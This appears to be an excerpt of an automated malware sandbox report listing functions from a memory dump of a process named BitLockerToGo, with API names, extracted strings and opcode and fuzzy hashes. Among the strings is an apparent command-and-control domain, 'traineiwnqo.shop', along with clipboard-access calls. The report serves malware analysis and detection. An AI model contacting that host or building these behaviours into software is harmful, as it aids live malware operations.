                  • String ID: #9uy$% `3$F\[R$NXcR$SVF$[23"$fch%$jabc$traineiwnqo.shop
                  • API String ID: 2188284642-1904044563
                  • Opcode ID: aaf5494a590f7cf0c3dd63bbb9bf8b9aeb9ebacfcb889a38e0261ff69fcbd6ac
                  • Instruction ID: 4b2d29b8bfe72f13d0b66b8d58f0dfca4e881a5ff8156ed59654b8b01f0949d1
                  • Opcode Fuzzy Hash: aaf5494a590f7cf0c3dd63bbb9bf8b9aeb9ebacfcb889a38e0261ff69fcbd6ac
                  • Instruction Fuzzy Hash: 2ED178B4904B408FD3348F398995763BBE1EF46310F148A2DE8EB9B795D734A409CB96
                  Function 004292F0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 115clipboardCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                  • String ID: #$G$}
                  • API String ID: 2832541153-3315264962
                  • Opcode ID: d07525dd3f4f61e4dad741b94980fcfc95e4c09087b10dfe6988b2c5b9df2585
                  • Instruction ID: 9ec54c6f304c2a59cb3b4f9788fd342170c61fb83a0088559bb0976fe49f8e5f
                  • Opcode Fuzzy Hash: d07525dd3f4f61e4dad741b94980fcfc95e4c09087b10dfe6988b2c5b9df2585
                  • Instruction Fuzzy Hash: BE41A570D08395CEDB00EBBC98487AEBFB0AB59314F14462DE4D5A72C1D7384945C76B
                  Function 00413A4A Relevance: 14.0, Strings: 10, Instructions: 1543COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *$01$4`[b$AA$RCA$RXRQ$Ry$Xy$ZPZi$de
                  • API String ID: 0-1081523222
                  • Opcode ID: f5b040ef43d8e7db7299446762f8f87dd3c8d710fa4c0caa6630eec9205990da
                  • Instruction ID: dd6156239c298a2191a67d888e2721898999a4e530a3facafc6cc9b0d98c7050
                  • Opcode Fuzzy Hash: f5b040ef43d8e7db7299446762f8f87dd3c8d710fa4c0caa6630eec9205990da
                  • Instruction Fuzzy Hash: 24A2A9B15083408FD314DF18D891AABBBF1EF96314F14892DE4D987392E339A945CB9B
                  Function 0040B900 Relevance: 12.9, Strings: 10, Instructions: 394COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: _^]$7k8i$E'I%$N#M!$O7d5$`?l=$d3`1$w{$}+q)$}E
                  • API String ID: 0-904053982
                  • Opcode ID: 836f281b5a09bcf819769e177f2016d7f31954a4eeda31fad278403dee135d54
                  • Instruction ID: 3e55397636059ab87dd9fa10306cbdeb5adb12d26f8bd97fda3331d1fabe30ee
                  • Opcode Fuzzy Hash: 836f281b5a09bcf819769e177f2016d7f31954a4eeda31fad278403dee135d54
                  • Instruction Fuzzy Hash: 26F123B1201B418FD3248F26D895B97BBF6FB95314F108A2DD5AA8BAA0C774B405CF84
                  Function 00414770 Relevance: 11.1, Strings: 8, Instructions: 1070COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 01$AA$DKA$Ry$V$de$n$tu
                  • API String ID: 0-693970191
                  • Opcode ID: 1e6b8a6ab5f119dc66f673421341656ae9e1f5a3d29f7337be2d8416101ab885
                  • Instruction ID: e112c6e9030b187760a1f9b7a10ed6f3aa6816029de3eab4fbb7c82cec69621e
                  • Opcode Fuzzy Hash: 1e6b8a6ab5f119dc66f673421341656ae9e1f5a3d29f7337be2d8416101ab885
                  • Instruction Fuzzy Hash: 8E7288B010C3808BD315DF29D4906ABBBE1EFD6314F188A2DE0D58B392D3799945CB9B
                  Function 00402410 Relevance: 10.6, Strings: 8, Instructions: 597COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .$.$0$[$false$null$true${
                  • API String ID: 0-1639024219
                  • Opcode ID: 1e40ec5799c3cb1fa2d07a8a6d6ae5c44b8af64e64a55e43d10cc7d61bc85e42
                  • Instruction ID: 5c59ee5253373d1b3d0a09760561934a645b09c01d06867b76f68254400d4cca
                  • Opcode Fuzzy Hash: 1e40ec5799c3cb1fa2d07a8a6d6ae5c44b8af64e64a55e43d10cc7d61bc85e42
                  • Instruction Fuzzy Hash: 0612E8B06043059BEB209F25DE497277BE4AF50308F14843EE889663D3E7BDD915CB5A
                  Function 0041BB22 Relevance: 10.6, Strings: 8, Instructions: 555COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4;$4`[b$4`[b$@7n5$T+Z)$X/^-$\3B1$
                  • API String ID: 0-1041528942
                  • Opcode ID: a5018a5415ba95ba1ac34e472a1f41f3bc5059276625cd41686ac534863dfa50
                  • Instruction ID: 40aeae7b15fbc002c6c087d185838e56929a330030470cbfe4d56a0099acd905
                  • Opcode Fuzzy Hash: a5018a5415ba95ba1ac34e472a1f41f3bc5059276625cd41686ac534863dfa50
                  • Instruction Fuzzy Hash: B5129871508381CBD728CF28D8906ABB7E2FF89700F54892EE5D687361D739D945CB8A
                  Function 00433C40 Relevance: 8.3, Strings: 6, Instructions: 836COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2?C$2DC$?DC$?DC$b=C$s
                  • API String ID: 0-3216349216
                  • Opcode ID: 2957658eb7a28c01f06add96b2220fb2f7b090400a39ba8e475c5e7880fe8998
                  • Instruction ID: 80944fd1b58fbf1ed20fd57652ff65be2a921dc111aa1d9d80fd5dc4b684d0d7
                  • Opcode Fuzzy Hash: 2957658eb7a28c01f06add96b2220fb2f7b090400a39ba8e475c5e7880fe8998
                  • Instruction Fuzzy Hash: EC42EE35609350CFD704DF29E88065AB7E2FF8A315F0A99BDD989973A1C335E811CB86
                  Function 0040B310 Relevance: 7.9, Strings: 6, Instructions: 430COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .'&!$3xk4E.2nDymKStRO43vRDjy22JgE06_vJkNrLPyvrcg-1725131410-0.0.1.1-/api$`$oj$}E$]
                  • API String ID: 0-127140058
                  • Opcode ID: 58d3ce9d94dca4fdd1c34d492e9603c3b94567c6082ebc1104ccb9c9d6b9308d
                  • Instruction ID: 7e865cd44222f29e0d9a5325266bc1132d819a284a002b31135377d2b5314aa7
                  • Opcode Fuzzy Hash: 58d3ce9d94dca4fdd1c34d492e9603c3b94567c6082ebc1104ccb9c9d6b9308d
                  • Instruction Fuzzy Hash: DCE1487150C3808BD315DF19C090A2BBBE6EFD5758F188A2EE4D96B391C3399845CB9B
                  Function 00414420 Relevance: 7.0, Strings: 5, Instructions: 760COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 01$AA$DKA$Ry$de
                  • API String ID: 0-704665975
                  • Opcode ID: 4c1f138457035d6c68107879cacb97b4618c473f1e292c676f9d17441937d413
                  • Instruction ID: 7a63c887bc984d353d46c6970a4e86c657c5a9b5c62fbb192a04889d909e87f5
                  • Opcode Fuzzy Hash: 4c1f138457035d6c68107879cacb97b4618c473f1e292c676f9d17441937d413
                  • Instruction Fuzzy Hash: 4C4287B010C3408BD314DF19D491A6BBBE2EFD6318F188A2DE0D58B392D3799955CB9B
                  Function 00433D90 Relevance: 7.0, Strings: 5, Instructions: 732COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2?C$2DC$?DC$?DC$s
                  • API String ID: 0-1385918893
                  • Opcode ID: f7940c1518a3a3a429de3a5d0fdf5f1f29b732de15425d724eaf1b30b994ff7b
                  • Instruction ID: 5b127b14689e9a1d6929d74740d33df50b51b45a3ed6347e7c51f1007d9c9e5c
                  • Opcode Fuzzy Hash: f7940c1518a3a3a429de3a5d0fdf5f1f29b732de15425d724eaf1b30b994ff7b
                  • Instruction Fuzzy Hash: D132BB35609350CFD304DF29E89065EB7E2EF8A315F0999ADD989973A1C335E811CB86
                  Function 0041A330 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 469COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: V9l?$yfg
                  • API String ID: 0-2481908295
                  • Opcode ID: e844857b6ce0ab3b4f900debbf1dc01e84ef004047b65286bd97edf8e4da22a0
                  • Instruction ID: 6dd91e7d3ff7c0a30cf73c66be5701c5a7b0132e8119057b69ca19cee304d995
                  • Opcode Fuzzy Hash: e844857b6ce0ab3b4f900debbf1dc01e84ef004047b65286bd97edf8e4da22a0
                  • Instruction Fuzzy Hash: BB022FB410D3809BD300EF19D880A2ABBF1EF96748F14491DF5C98B3A1D3789991CB9B
                  Function 00419A1F Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 445COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $
                  • API String ID: 0-1425349742
                  • Opcode ID: fc6a758fadca9737716de0051168731e12818896d3889ea87bf2eac23d32ce8e
                  • Instruction ID: 072e0d79e7c42b1eb3a57f06931f97969741f2a2807d5e99c93f880bdf866171
                  • Opcode Fuzzy Hash: fc6a758fadca9737716de0051168731e12818896d3889ea87bf2eac23d32ce8e
                  • Instruction Fuzzy Hash: 79E1BA71608306DFD704CF28D8907AAB3E6FF89310F09897DE985872A1D738E955CB85
                  Function 00433F40 Relevance: 5.6, Strings: 4, Instructions: 638COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2DC$?DC$?DC$s
                  • API String ID: 0-327821026
                  • Opcode ID: 159601a5c20176f9849a8d1fa8bc2623efffbc4aa3cd89c8c62b0c8b237ce1b6
                  • Instruction ID: be0f7da86291363fd3d0abb89f81f45c0b506050416a6cc7d85ac79a39c188bd
                  • Opcode Fuzzy Hash: 159601a5c20176f9849a8d1fa8bc2623efffbc4aa3cd89c8c62b0c8b237ce1b6
                  • Instruction Fuzzy Hash: 6712DC35609350CFD304DF29E88065EB7E2FF8A315F0999ADE98987391C335E815CB86
                  Function 00434030 Relevance: 5.6, Strings: 4, Instructions: 590COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2DC$?DC$?DC$s
                  • API String ID: 0-327821026
                  • Opcode ID: 85031cf8acefe96eba258264f97220992697cf902fb531b5b6dfbd7f26fc22f5
                  • Instruction ID: 7efa371459fe7c05da783cf2b2b2d3273da10793bef3e7687d72e8751e7a08f6
                  • Opcode Fuzzy Hash: 85031cf8acefe96eba258264f97220992697cf902fb531b5b6dfbd7f26fc22f5
                  • Instruction Fuzzy Hash: 1712BA35609350CFD704DF29E88065EB7E2EF8A314F0999ADE9C997392C335E815CB86
                  Function 00434110 Relevance: 5.6, Strings: 4, Instructions: 556COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2DC$?DC$?DC$s
                  • API String ID: 0-327821026
                  • Opcode ID: d8757200fffb245845b533aaa383fbe3780f766114fd9115fcad59d214e14e3f
                  • Instruction ID: 0fc31a3e566fe26334864a807a30ca6bd604d6e39edd27a38e5d5b831c862a8b
                  • Opcode Fuzzy Hash: d8757200fffb245845b533aaa383fbe3780f766114fd9115fcad59d214e14e3f
                  • Instruction Fuzzy Hash: 3D02CA31608350CFD704DF29D89066EB7E2EF8A314F099A6DE9C997391C335E815CB8A
                  Function 004335D2 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /;C$R:C$`8C$s
                  • API String ID: 0-1280230338
                  • Opcode ID: 9dfaa6e602e47136cbf600a475ec0ca75de5ea6a0cb0220fd319a15ccf8e5663
                  • Instruction ID: db972f95e1eaf7e6f153578093b352d2cdc8bd2e117a66f08ed305abeba2462c
                  • Opcode Fuzzy Hash: 9dfaa6e602e47136cbf600a475ec0ca75de5ea6a0cb0220fd319a15ccf8e5663
                  • Instruction Fuzzy Hash: B4020576E04511CFCB08CF68E8916AEBBB2FF89311F299179D851AB391C735AD01CB94
                  Function 0041CA10 Relevance: 5.4, Strings: 4, Instructions: 413COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4`[b$4`[b$LP$qs
                  • API String ID: 0-2630338501
                  • Opcode ID: 388bdd4dfe294b1c22f6c3b8cb9a7b69a8772f876b8f910b4e339b90a3291543
                  • Instruction ID: 78cec6447725230fa3eb2fa9609e048c3993b9aa3b33d216afbdf4eefedb7f7c
                  • Opcode Fuzzy Hash: 388bdd4dfe294b1c22f6c3b8cb9a7b69a8772f876b8f910b4e339b90a3291543
                  • Instruction Fuzzy Hash: E6F18AB0108340DFE724CF19E991B6BBBE1FB85304F50992DE6C587291DB35A855CB8A
                  Function 00433BA8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /;C$R:C$`8C$s
                  • API String ID: 0-1280230338
                  • Opcode ID: 655f8fccaf15fb722dad6641eb2e78eeb8ac140a87eebf10034085affa85c96c
                  • Instruction ID: 6a2340be98cd46c8efa987ddef37cc2cddfc62bdec8a015cf6f27d5ec7d7eaf9
                  • Opcode Fuzzy Hash: 655f8fccaf15fb722dad6641eb2e78eeb8ac140a87eebf10034085affa85c96c
                  • Instruction Fuzzy Hash: B5A1C176E14115CFCB08CF68E8916AEB7B2FF8D311F299179D811AB391C735A942CB84
                  Function 004235B0 Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "20:$5SB$jzz
                  • API String ID: 0-1037800694
                  • Opcode ID: 07d5ec38c7bcea506c04034ebbcbd86039c00acd1115c92eee2ac9dc12ebf5f1
                  • Instruction ID: e6a2a71cc1bd430bb600a33f9cd51ecc461c738ffeae1532bc2bf40bf5be89e0
                  • Opcode Fuzzy Hash: 07d5ec38c7bcea506c04034ebbcbd86039c00acd1115c92eee2ac9dc12ebf5f1
                  • Instruction Fuzzy Hash: 1F82DA70204B928BD3248F39D4947A3BBF1AF52305F584A6ED4EB8B792D33DA505CB58
                  Function 0040E20B Relevance: 4.6, Strings: 3, Instructions: 899COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2$EI$@
                  • API String ID: 0-1402357096
                  • Opcode ID: 7299bc72a297ea20628d2e9cd59941680b863bb9bb70c54d7e49d85cb37a9e6a
                  • Instruction ID: 4370179656a6890dc68f3290907031d94b138505fc62ba20085aa00ee52d8d14
                  • Opcode Fuzzy Hash: 7299bc72a297ea20628d2e9cd59941680b863bb9bb70c54d7e49d85cb37a9e6a
                  • Instruction Fuzzy Hash: E26278B15083408BD314EF29D890B5FBBE5AF96304F040D2EE5C5972A2E73AD865CB5B
                  Function 00419040 Relevance: 4.2, Strings: 3, Instructions: 460COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ()$4`[b$
                  • API String ID: 0-3545647141
                  • Opcode ID: 42f7456d711a5a77c75534867108c93f3e66ba327a4a65dc3f19896d9b8c8b38
                  • Instruction ID: ff6047f10b3e7aacfcc98422c9f2e52bc137357e4b7c328f5d85b9b8f3abbfe8
                  • Opcode Fuzzy Hash: 42f7456d711a5a77c75534867108c93f3e66ba327a4a65dc3f19896d9b8c8b38
                  • Instruction Fuzzy Hash: B9D1B2716082009BD714DF19C8A1B6BB7F1EF99754F08891EE8C587391E339ED81CB5A
                  Function 0041F7B2 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4`[b$L^${E
                  • API String ID: 0-205994047
                  • Opcode ID: ab5861d999dff799b5744bdd94a0447dcd8cc80f858cd187eef36c239924e4a2
                  • Instruction ID: 7d5f20c2f7228d7d7236174fc6c81315b3c11ce4c74f9500d7428e768866b440
                  • Opcode Fuzzy Hash: ab5861d999dff799b5744bdd94a0447dcd8cc80f858cd187eef36c239924e4a2
                  • Instruction Fuzzy Hash: 5181AB70508341DBE314DF18D890B6BB3B2FF85344F14992DE989872A1E778A855CB9A
                  Function 00401618 Relevance: 3.3, Strings: 2, Instructions: 845COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pC$pC
                  • API String ID: 0-1741592910
                  • Opcode ID: 9a1a31c72b29650397bf7deaf79bca70ee864a2f975d4fb86e0b4d05c95e7754
                  • Instruction ID: 1aba1b62fe6d5247060263ada30d654aa019256d3ec320f5ad251fbbe2a450d3
                  • Opcode Fuzzy Hash: 9a1a31c72b29650397bf7deaf79bca70ee864a2f975d4fb86e0b4d05c95e7754
                  • Instruction Fuzzy Hash: 7D62303AA18195CFDB048F78E8A13EAB7F2BB5A311F0C94B5C590933A1C3789A55CF54
                  Function 004061F0 Relevance: 3.3, Strings: 2, Instructions: 796COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: 0435f3538a8559778474a4fb365cdd28809749da175b3a1777f59edcaa833196
                  • Instruction ID: e44d188f2691eb329e2fcd9be1f0dab1ccde9638a00b0bc5b13d5e102431d145
                  • Opcode Fuzzy Hash: 0435f3538a8559778474a4fb365cdd28809749da175b3a1777f59edcaa833196
                  • Instruction Fuzzy Hash: 6B7258716083409FD714CF18C880B9BBBE1BF88314F55892EF98A9B391D379D958CB96
                  Function 0040D978 Relevance: 3.2, Strings: 2, Instructions: 672COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsSystem
                  • String ID: traineiwnqo.shop$OM
                  • API String ID: 4116985748-528943683
                  • Opcode ID: b728a634c078d0a89bd3c497fd42067704e2a79c045c36025228c2162414b7ab
                  • Instruction ID: 7203abc0895e22b010cafa7de48a35fee8694d0ce421661dfcf0d312008777a1
                  • Opcode Fuzzy Hash: b728a634c078d0a89bd3c497fd42067704e2a79c045c36025228c2162414b7ab
                  • Instruction Fuzzy Hash: 3C2201B46046818FE325CF29D491A26FBF2FF5A304B18496DD0C28B792D739E845CBD9
                  Function 00411CDA Relevance: 3.1, Strings: 2, Instructions: 556COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2$Tu[w
                  • API String ID: 0-1296751759
                  • Opcode ID: df3bd4eaf6003bf32da01b1b4ae2924b84bb03758ef5ebe527204979e1053bdb
                  • Instruction ID: f9c6298aeb404d0095fc6a7dfa5a3fe0d385e261630af42810e495b367b42691
                  • Opcode Fuzzy Hash: df3bd4eaf6003bf32da01b1b4ae2924b84bb03758ef5ebe527204979e1053bdb
                  • Instruction Fuzzy Hash: BA0266B06093419BD714CF14D49076BBBF2EF86388F58992DE5C987361E339E885CB4A
                  Function 00420E60 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "$"
                  • API String ID: 0-3758156766
                  • Opcode ID: 394b7df4ae36b0861bcf7c6aed455d38e0f295583bf2030b1c4f6209659d3c1f
                  • Instruction ID: 7e193ea918f45b2c52e26e6636be87b9239a8bd7ee15fd7d1f1157bae2619bf9
                  • Opcode Fuzzy Hash: 394b7df4ae36b0861bcf7c6aed455d38e0f295583bf2030b1c4f6209659d3c1f
                  • Instruction Fuzzy Hash: 1FF17B71B083218FD714CE24D48072BB7E6AF94354F598A2FE895873A2D738DD49C786
                  Function 00405780 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )$IEND
                  • API String ID: 0-707183367
                  • Opcode ID: f8d2d55e293783aefb695f2a6e1aceb8a0cbd75d5354af6212a3ed4ba1738dcf
                  • Instruction ID: bca1032bbc65deb52283aa6c9a221f74089e829b345dc8bf92daa062bbf991b6
                  • Opcode Fuzzy Hash: f8d2d55e293783aefb695f2a6e1aceb8a0cbd75d5354af6212a3ed4ba1738dcf
                  • Instruction Fuzzy Hash: D4F1AD71A08B01ABE314DF25C89571BBBE0EB84304F14853EE995A73C2D778E914CB96
                  Function 004197B7 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: q$
                  • API String ID: 0-2085942699
                  • Opcode ID: fb27c3b23caaed9c678c5b09804921665eec9b174692116d7bf1f1f54cedaad7
                  • Instruction ID: 1538de96dd693107ccc46b8f1f31662cef0ddde731d9de16e39e92de7b3e2983
                  • Opcode Fuzzy Hash: fb27c3b23caaed9c678c5b09804921665eec9b174692116d7bf1f1f54cedaad7
                  • Instruction Fuzzy Hash: 6C5176B02183809FD354DF18D8A062BBBE1FF86701F145A2EE1D18B3A1C3399891CB4A
                  Function 00401AD5 Relevance: 1.9, Strings: 1, Instructions: 674COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pC
                  • API String ID: 0-3243261774
                  • Opcode ID: 574da08263025c863fc81e17258f6b233000779a127d4f6a8fd6dde2277bc46f
                  • Instruction ID: 3501948d1093f1ccc8919027da2af4e56de308c2a77b76b3e88da476325831ef
                  • Opcode Fuzzy Hash: 574da08263025c863fc81e17258f6b233000779a127d4f6a8fd6dde2277bc46f
                  • Instruction Fuzzy Hash: 2C323236A18155CFDB048F78E8A13EABBF2FB5A311F0D94B5C594A7391C3789A11CB60
                  Function 00418DE0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.OLE32(00437538,00000000,00000001,00437528), ref: 00418E09
                  Memory Dump Source
